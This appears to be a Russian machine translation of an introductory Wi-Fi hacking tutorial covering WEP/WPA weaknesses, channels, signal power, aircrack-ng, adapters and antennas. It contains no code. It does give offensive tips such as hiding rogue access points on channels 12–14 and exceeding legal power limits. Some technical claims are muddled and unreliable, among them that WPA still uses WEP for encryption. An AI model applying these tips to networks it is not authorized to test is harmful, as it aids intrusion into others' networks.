С точки зрения хакера, технологии беспроводной безопасности являются одними из наиболее важных функций. Несколько технологий безопасности были развернуты в Wi-Fi, чтобы сделать небезопасную технологию по своей природе безопасной. Наш подход к атаке будет зависеть от того, какая из этих технологий безопасности будет внедрена.

Итак, давайте кратко рассмотрим их здесь.

WEP

WEP, или проводная эквивалентная конфиденциальность, была первой используемой схемой беспроводной безопасности. Как следует из названия, он был разработан для обеспечения безопасности конечного пользователя, что по существу эквивалентно конфиденциальности, которой пользовались в проводной среде. К сожалению, это с треском провалилось.

По ряду причин WEP чрезвычайно легко взломать из-за некорректной реализации алгоритма шифрования RC4.Нередко можно взломать WEP менее чем за 5 минут. Это связано с тем, что WEP использовал очень маленький (24-битный) вектор инициализации (IV), который можно было бы захватить в потоке данных, и этот IV можно было бы затем использовать для обнаружения пароля с использованием статистических методов.

Несмотря на это, я все еще нахожу его используемым в реализации домашних хозяйств и малого бизнеса, но редко в корпоративной среде.

WPA

WPA стал ответом отрасли на выявленные недостатки WEP.Его часто называют WPA1, чтобы отличить его от WPA2.

WPA использовал протокол целостности временного ключа (TKIP) для повышения безопасности WEP, не требуя нового оборудования. Он по-прежнему использует WEP для шифрования, но делает статистические атаки, используемые для взлома WEP, гораздо более сложным и трудоемким.

WPA2-PSK

WPA2-PSK — это реализация WPA2 для домашнего или малого бизнеса. Как следует из названия, это реализация WPA2, которая использует предварительный общий ключ (PSK).Именно этот стандарт безопасности используется большинством домашних хозяйств сегодня, и хотя он гораздо более безопасен, он все же уязвим для различных атак.

Функция, которая была добавлена ​​в 2007 году и называлась Wi-Fi Protected Setup, или WPS, позволяет нам обходить защиту в WP2-PSK. Мы рассмотрим несколько атак на WPA2-PSK в ближайшие недели.

WPA2-AES

WPA2-AES — это реализация WPA2 на предприятии. Он использует Advanced Encryption Standard или AES для шифрования данных и является наиболее безопасным.Это часто связано с сервером RADIUS, который предназначен для аутентификации.

Хотя взломать это возможно, это значительно сложнее.

Шаг 3: Каналы

Как и в нашем радио, беспроводная связь имеет несколько каналов, так что различные потоки связи не мешают друг другу. Стандарт 802.11 допускает каналы в диапазоне от 1 до 14.

В США FCC регулирует беспроводную связь, и устройства для использования в штатах могут использовать только каналы с 1 по 11.Европа использует каналы с 1 по 13, а Япония с 1 по 14. Другие страны также могут использовать полный диапазон.

Для хакера это может быть полезной информацией, так как мошенническая точка доступа, использующая канал с 12 по 14, будет невидима для беспроводных устройств США и специалистов по безопасности, сканирующих мошеннические точки доступа.

How to Hack Wi-Fi: Getting Started with Terms & Technologies

Каждый канал имеет ширину 22 МГц вокруг центральной частоты. Чтобы избежать помех, AP может использовать любой из этих каналов, но во избежание любого наложения каналы 1, 6 и 11 чаще всего используются в U.S. Можно использовать другие каналы, но поскольку вам нужно пять каналов между рабочими каналами, чтобы не перекрывать сигналы, с тремя или более каналами будут работать только 1, 6 и 11.

Шаг 4. Датаграммы и фреймы

Понимание структуры беспроводных дейтаграмм имеет решающее значение для успешного взлома беспроводных сетей, но выходит за рамки данного введения. Я представлю эту информацию по мере необходимости в будущих уроках, но вы можете потратить некоторое время на изучение беспроводных кадров и дейтаграмм из других источников.

Шаг 5: Уровень сигнала

В США FCC регулирует, помимо прочего, уровень сигнала точки беспроводного доступа. FCC говорит, что сигнал точки доступа не может превышать 27 дБм (500 милливатт). Большинство точек доступа имеют это встроенное ограничение, но мы можем изменить и отменить это ограничение, если точка доступа способна к более сильному сигналу. Это может быть полезно хакеру при настройке злых близнецов и мошеннических точек доступа, где сила сигнала является критической, среди других методов.

Шаг 6: Aircrack-Ng

Для почти всех наших взломов Wi-Fi мы будем использовать aircrack-ng, который включен в BackTrack. Даже в тех хакерах, где мы используем другие инструменты, такие как cowpatty или reaver, мы будем использовать набор инструментов aircrack-ng для некоторой части взлома, поэтому нам необходимо ознакомиться с ним.

В ближайшее время я, вероятно, сделаю специальный урок по комплекту aircrack-ng.

Шаг 7. Адаптеры Wi-Fi

Чтобы стать эффективным хакером Wi-Fi, необходим адаптер Wi-Fi.Как правило, адаптер Wi-Fi на вашем ноутбуке или рабочем столе не подходит для наших целей. Ключевой возможностью, которая нам нужна, является способность вводить пакетов в точку доступа, и большинство обычных беспроводных адаптеров не способны к внедрению пакетов. У Aircrack-ng есть список адаптеров Wi-Fi, которые могут работать с их набором инструментов.

При этом я настоятельно рекомендую беспроводной адаптер USB Alfa AWUS036NH. Это то, что я использую. Он доступен в нескольких местах по цене от 30 до 50 долларов.

How to Hack Wi-Fi: Getting Started with Terms & Technologies

Он делает все, что мне нужно, быстро, имеет внешнюю антенну, распознается BackTrack и автоматически загружает драйверы. Кроме того, он поставляется в версиях 1000 МВт и 2000 МВт. Это может иметь решающее значение в хакерских мошеннических точках доступа, несмотря на то, что FCC ограничивает мощность сигнала 500 мВт.

Шаг 8: Аттенны

Антенны бывают двух основных типов, всенаправленные и направленные. Большинство точек доступа и беспроводных адаптеров поставляются с всенаправленными антеннами, что означает, что они отправляют и получают во всех направлениях.

Карта Alfa, которую я рекомендую, имеет внешнюю антенну, которая является всенаправленной, но имеет усиление 5 дБи (усиление является мерой применительно к антеннам того, насколько антенна может увеличить сигнал). Это означает, что он может увеличить сигнал, сфокусировав сигнал, аналогичный отражателю на фонаре. Кроме того, он может менять положение для лучшего приема определенных сигналов, а также адаптера для кабеля и присоски для монтажа на стене или в окне.

How to Hack Wi-Fi: Getting Started with Terms & Technologies

Направленные антенны также могут быть полезны для взлома при попытке сфокусировать ваши эксплойты на удаленной точке доступа.В литературе содержатся ссылки на сигналы Wi-Fi, которые были отправлены и получены на расстоянии более 100 миль или около 160 км с использованием направленных антенн. Для большинства коммерческих направленных антенн вы можете рассчитывать на беспроводную связь до 4 км или 2,4 мили.

Они могут быть получены из различных источников, как правило, по цене менее 100 долл. США с коэффициентом усиления от 15 до 20 дБи. Антенна Yagi является примером направленной антенны, которая часто используется для взлома беспроводной связи на значительных расстояниях.

How to Hack Wi-Fi: Getting Started with Terms & Technologies

Вот и все … На данный момент

Итак, вот и начинается наше увлекательное путешествие по взлому Wi-Fi. Очень скоро вы сможете взломать практически любой беспроводной интернет, поэтому продолжайте возвращаться, чтобы расширить свои знания и навыки по взлому Wi-Fi.

Хотите начать зарабатывать как хакер в белой шляпе? Начните свою карьеру хакера в белой шляпе с нашим учебным комплектом по сертификации этики для взлома 2020 года Premium из нового магазина Null Byte и получите более 60 часов обучения от профессионалов по этике.

Купить (скидка 90%)>

Изображение на обложке через Shutterstock

,

Отправить ответ

avatar
  Подписаться  
Уведомление о